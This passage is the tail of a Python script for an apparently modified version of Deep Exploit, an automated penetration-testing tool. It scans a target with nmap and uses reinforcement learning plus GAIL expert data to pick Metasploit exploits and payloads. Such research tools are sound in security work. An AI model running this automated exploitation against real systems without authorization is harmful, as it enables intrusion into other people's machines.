2260 | time.sleep(3.0) 2261 | 2262 | # Finally save learned weights. 2263 | self.util.print_message(OK, 'Save learned data: {}'.format(self.thread_name)) 2264 | saver.save(SESS, train_path) 2265 | 2266 | # Disconnection RPC Server. 2267 | self.environment.env.client.termination(self.environment.env.client.console_id) 2268 | 2269 | if self.thread_name == 'local_thread1': 2270 | # Create plot. 
2271 |                         df_plot = pd.DataFrame({'exploitation': plot_count,
2272 |                                                 'post-exploitation': plot_pcount})
2273 |                         nowTime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
2274 |                         name = 'experiment' + str(nowTime)
2275 |                         df_plot.to_csv(os.path.join(self.environment.env.data_path, name + ".csv"))
2276 |                         df_plot.plot(kind='line', title='Training result.', legend=True)
2277 |                         plt.savefig(self.environment.env.plot_file)
2278 |                         plt.close('all')
2279 | 
2280 |                     # Create report.
2281 |                     report = CreateReport()
2282 |                     report.create_report('train', pd.to_datetime(self.environment.env.scan_start_time))
2283 |                     break
2284 |             else:
2285 |                 # Execute testing thread.
2286 |                 self.environment.run(exploit_tree, target_tree)
2287 | 
2288 |                 # Stop testing thread.
2289 |                 if isFinish:
2290 |                     self.util.print_message(OK, 'Finish test.')
2291 |                     time.sleep(3.0)
2292 | 
2293 |                     # Disconnection RPC Server.
2294 |                     self.environment.env.client.termination(self.environment.env.client.console_id)
2295 | 
2296 |                     # Create report.
2297 |                     report = CreateReport()
2298 |                     report.create_report('test', pd.to_datetime(self.environment.env.scan_start_time))
2299 |                     break
2300 | 
2301 | 
2302 | # Show initial banner.
2303 | def show_banner(util, delay_time=2.0):
2304 |     banner = u"""
2305 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2306 | ██████╗ ███████╗███████╗██████╗ ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗
2307 | ██╔══██╗██╔════╝██╔════╝██╔══██╗ ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
2308 | ██║ ██║█████╗ █████╗ ██████╔╝ █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║
2309 | ██║ ██║██╔══╝ ██╔══╝ ██╔═══╝ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║
2310 | ██████╔╝███████╗███████╗██║ ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║
2311 | ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ (beta)
2312 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2313 | """
2314 |     util.print_message(NONE, banner)
2315 |     show_credit(util)
2316 |     # time.sleep(delay_time)
2317 | 
2318 | 
2319 | # Show credit.
2320 | def show_credit(util):
2321 |     credit = u"""
2322 |     =[ Deep Exploit v0.0.2-beta ]=
2323 | + -- --=[ Author : Isao Takaesu (@bbr_bbq) ]=--
2324 | + -- --=[ Website : https://github.com/13o-bbr-bbq/machine_learning_security/ ]=--
2325 |     """
2326 |     util.print_message(NONE, credit)
2327 | 
2328 | 
2329 | # Check IP address format.
2330 | def is_valid_ip(rhost):
2331 |     try:
2332 |         ipaddress.ip_address(rhost)
2333 |         return True
2334 |     except ValueError:
2335 |         return False
2336 | 
2337 | 
2338 | # Define command option.
2339 | __doc__ = """{f}
2340 | Usage:
2341 |     {f} (-t | --target <ip_addr>) (-m | --mode <mode>)
2342 |     {f} (-t | --target <ip_addr>) [(-p | --port <port>)] [(-s | --service <service>)]
2343 |     {f} -h | --help
2344 | 
2345 | Options:
2346 |     -t --target   Require : IP address of target server.
2347 |     -m --mode     Require : Execution mode "train/test".
2348 |     -p --port     Optional : Indicate port number of target server.
2349 |     -s --service  Optional : Indicate product name of target server.
2350 |     -h --help     Optional : Show this screen and exit.
2351 | """.format(f=__file__)
2352 | 
2353 | 
2354 | # Parse command arguments.
2355 | def command_parse():
2356 |     args = docopt(__doc__)
2357 |     ip_addr = args['<ip_addr>']
2358 |     mode = args['<mode>']
2359 |     port = args['<port>']
2360 |     service = args['<service>']
2361 |     return ip_addr, mode, port, service
2362 | 
2363 | 
2364 | # Check parameter values.
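# Example invocation based on the usage string above (the IP address is only illustrative):
#   python DeepExploit-GAILDPPO.py --target 192.168.220.145 --mode train
# The optional --port / --service pattern lets check_port_value() below validate an
# explicitly indicated port number and product name for a pinpointed test.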
2365 | def check_port_value(port=None, service=None):
2366 |     if port is not None:
2367 |         if port.isdigit() is False:
2368 |             Utilty().print_message(OK, 'Invalid port number: {}'.format(port))
2369 |             return False
2370 |         elif (int(port) < 1) or (int(port) > 65535):
2371 |             Utilty().print_message(OK, 'Invalid port number: {}'.format(port))
2372 |             return False
2373 |         elif port not in com_port_list:
2374 |             Utilty().print_message(OK, 'Not open port number: {}'.format(port))
2375 |             return False
2376 |         elif service is None:
2377 |             Utilty().print_message(OK, 'Invalid service name: {}'.format(str(service)))
2378 |             return False
2379 |         elif isinstance(service, int):
2380 |             Utilty().print_message(OK, 'Invalid service name: {}'.format(str(service)))
2381 |             return False
2382 |         else:
2383 |             return True
2384 |     else:
2385 |         return False
2386 | 
2387 | 
2388 | # Common list of all threads.
2389 | com_port_list = []
2390 | com_exploit_list = []
2391 | com_payload_list = []
2392 | com_indicate_flag = False
2393 | 
2394 | 
2395 | if __name__ == '__main__':
2396 |     t1 = time.time()
2397 |     util = Utilty()
2398 |     REWARDS = []
2399 |     path = os.path.join("/home/star/DeepExploit1/bingo/")
2400 |     file = path + "DPPOGAILbingo8.21" + ".csv"
2401 |     expert_a = []
2402 |     expert_s = np.genfromtxt(
2403 |         '/home/star/DeepExploit1/trajectory/GAIL_state.csv')
2404 |     a_list = np.genfromtxt(
2405 |         '/home/star/DeepExploit1/trajectory/GAIL_action.csv', dtype=np.int32)
2406 |     # Convert each expert action index to its own one-hot vector.
2407 |     for i in range(len(a_list)):
2408 |         a = a_list[i]
2409 |         a_cats = np.zeros(593)
2410 |         a_cats[a] = 1
2411 |         expert_a.append(a_cats)
2412 |     # D = Discriminator()
2413 |     # Get command arguments.
2414 |     rhost, mode, port, service = command_parse()
2415 |     if is_valid_ip(rhost) is False:
2416 |         util.print_message(FAIL, 'Invalid IP address: {}'.format(rhost))
2417 |         exit(1)
2418 |     if mode not in ['train', 'test']:
2419 |         util.print_message(FAIL, 'Invalid mode: {}'.format(mode))
2420 |         exit(1)
2421 | 
2422 |     # Show initial banner.
2423 |     show_banner(util, 0.1)
2424 | 
2425 |     # Initialization of Metasploit.
2426 |     env = Metasploit(rhost)
2427 |     if rhost in env.prohibited_list:
2428 |         util.print_message(FAIL, 'Target IP={} is prohibited.\n'
2429 |                                  '    Please check "config.ini"'.format(rhost))
2430 |         exit(1)
2431 |     nmap_result = 'nmap_result_' + env.rhost + '.xml'
2432 |     nmap_command = env.nmap_command + ' ' + nmap_result + ' ' + env.rhost + '\n'
2433 |     env.execute_nmap(env.rhost, nmap_command, env.nmap_timeout)
2434 |     com_port_list, proto_list, info_list = env.get_port_list(nmap_result, env.rhost)
2435 |     com_exploit_list = env.get_exploit_list()
2436 |     com_payload_list = env.get_payload_list()
2437 |     com_payload_list.append('no payload')
2438 | 
2439 |     # Create exploit tree.
2440 |     exploit_tree = env.get_exploit_tree()
2441 | 
2442 |     # Create target host information.
2443 |     com_indicate_flag = check_port_value(port, service)
2444 |     if com_indicate_flag:
2445 |         target_tree, com_port_list = env.get_target_info_indicate(rhost, proto_list, info_list, port, service)
2446 |     else:
2447 |         target_tree = env.get_target_info(rhost, proto_list, info_list)
2448 | 
2449 |     # Initialization of global option.
2450 |     TRAIN_WORKERS = env.train_worker_num
2451 |     TEST_WORKER = env.test_worker_num
2452 |     MAX_STEPS = env.train_max_steps
2453 |     MAX_TRAIN_NUM = env.train_max_num
2454 |     Tmax = env.train_tmax
2455 | 
2456 |     env.client.termination(env.client.console_id)  # Disconnect common MSFconsole.
2457 |     NUM_ACTIONS = len(com_payload_list)  # Set action number.
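    # Assumed format of the GAIL expert data loaded above:
    #   GAIL_state.csv  - one row per expert step with NUM_STATES (=5) columns, matching the
    #                     state layout [ST_OS_TYPE, ST_SERV_NAME, ST_SERV_VER, ST_MODULE, ST_TARGET].
    #   GAIL_action.csv - one payload index per expert step, one-hot encoded here into vectors
    #                     of length 593 (the action dimension hard-coded in the Discriminator).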
2458 |     NONE_STATE = np.zeros(NUM_STATES)  # Initialize state (s).
2459 | 
2460 |     # Define global variables, start TensorFlow session.
2461 |     frames = 0                 # Total trial number over all threads.
2462 |     isFinish = False           # Finishing learning/testing flag.
2463 |     update_local_weight_count = 0  # Number of global weight updates (for TensorBoard logging).
2464 |     post_exploit_count = 0     # Number of successful post-exploitation.
2465 |     exploit_count = 0          # Number of successful exploitation.
2466 |     plot_count = [0]           # Exploitation count list for plot.
2467 |     plot_pcount = [0]          # Post-exploit count list for plot.
2468 |     SESS = tf.Session()        # Start TensorFlow session.
2469 | 
2470 |     with tf.device("/cpu:0"):
2471 |         parameter_server = ParameterServer()
2472 |         threads = []
2473 | 
2474 |         if mode == 'train':
2475 |             # Create learning threads.
2476 |             for idx in range(TRAIN_WORKERS):
2477 |                 thread_name = 'local_thread' + str(idx + 1)
2478 |                 threads.append(Worker_thread(thread_name=thread_name,
2479 |                                              thread_type="learning",
2480 |                                              parameter_server=parameter_server,
2481 |                                              rhost=rhost))
2482 |         else:
2483 |             # Create testing thread.
2484 |             for idx in range(TEST_WORKER):
2485 |                 thread_name = 'local_thread1'
2486 |                 threads.append(Worker_thread(thread_name=thread_name,
2487 |                                              thread_type="test",
2488 |                                              parameter_server=parameter_server,
2489 |                                              rhost=rhost))
2490 | 
2491 |     # Define saver.
2492 |     saver = tf.train.Saver()
2493 | 
2494 |     # Execute TensorFlow with multiple threads.
2495 |     COORD = tf.train.Coordinator()              # Prepare TensorFlow for multi-threading.
2496 |     SESS.run(tf.global_variables_initializer()) # Initialize variables.
2497 |     tensorboard_dir = '/home/star/DeepExploit1/logGD'
2498 |     writer = tf.summary.FileWriter(tensorboard_dir, SESS.graph)
2499 |     running_threads = []
2500 |     if mode == 'train':
2501 |         # Load past learned data.
2502 |         if os.path.exists(env.save_file) is True:
2503 |             # Restore learned model from local file.
2504 |             util.print_message(OK, 'Restore learned data.')
2505 |             saver.restore(SESS, env.save_file)
2506 | 
2507 |         # Execute learning.
2508 |         for worker in threads:
2509 |             job = lambda worker=worker: worker.run(exploit_tree, target_tree, saver, env.save_file)  # Bind worker per iteration to avoid late binding.
2510 |             t = threading.Thread(target=job)
2511 |             t.start()
2512 |     else:
2513 |         # Execute testing.
2514 |         # Restore learned model from local file.
2515 |         util.print_message(OK, 'Restore learned data.')
2516 |         saver.restore(SESS, env.save_file)
2517 |         for worker in threads:
2518 |             job = lambda worker=worker: worker.run(exploit_tree, target_tree)  # Bind worker per iteration to avoid late binding.
2519 |             t = threading.Thread(target=job)
2520 |             t.start()
2521 | 
--------------------------------------------------------------------------------